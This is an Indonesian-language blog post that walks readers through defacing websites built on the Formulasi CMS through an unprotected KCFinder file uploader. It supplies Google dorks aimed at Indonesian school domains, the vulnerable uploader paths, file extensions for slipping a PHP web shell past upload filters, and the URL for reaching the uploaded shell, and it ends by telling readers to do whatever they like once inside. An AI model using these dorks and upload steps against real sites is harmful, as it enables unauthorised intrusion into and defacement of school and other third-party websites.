Deface Poc Kcfinder Di CMS Formulasi

Halo sobat miskin :v kembali lagi dengan saya MarsHall btw sorry ya baru update lagi dikarenakan sibuk :'v langsung aja guys...


Bahan-bahan

Dork (Sudah saya siapin dibawah )
Exploit (ada dibawah gan )
Shell ber ext .php5 .php.xxxjpg .php.fla
Siapkan kesabaran Anda

Dork

inurl:data-link- site:sch.id
inurl:/?p=detberita&id=
powered by Formulasi Free Opensource CMS

Exploit

Adminpanel/ckeditor/kcfinder/browse.php
Adminpanel/ckeditor/kcfinder/upload.php

Csrf : Klik Disini


1. Dorking target di google search engine

2. Cari situs yang masih vuln, Biar bisa diupload shell

3. Masukkan exploit

contoh : http://site.sch.id/[path]/adminpanel/ckeditor/kcfinder/browse.php

4. Upload shell kalian dengan ext yang diatas tadi kalo masih gak bisa ya kalian perbanyak ngaca lagi deh hehehe

5. Kalo sukses terupload, tinggal akses shellnya. Masukkan exploit ini
http://site.sch.id/[path]images/files/namashell.php

6. Kalo udah kebuka aksesnya, terserah kalian mau diapain.

Post a Comment

0 Comments

Iklanku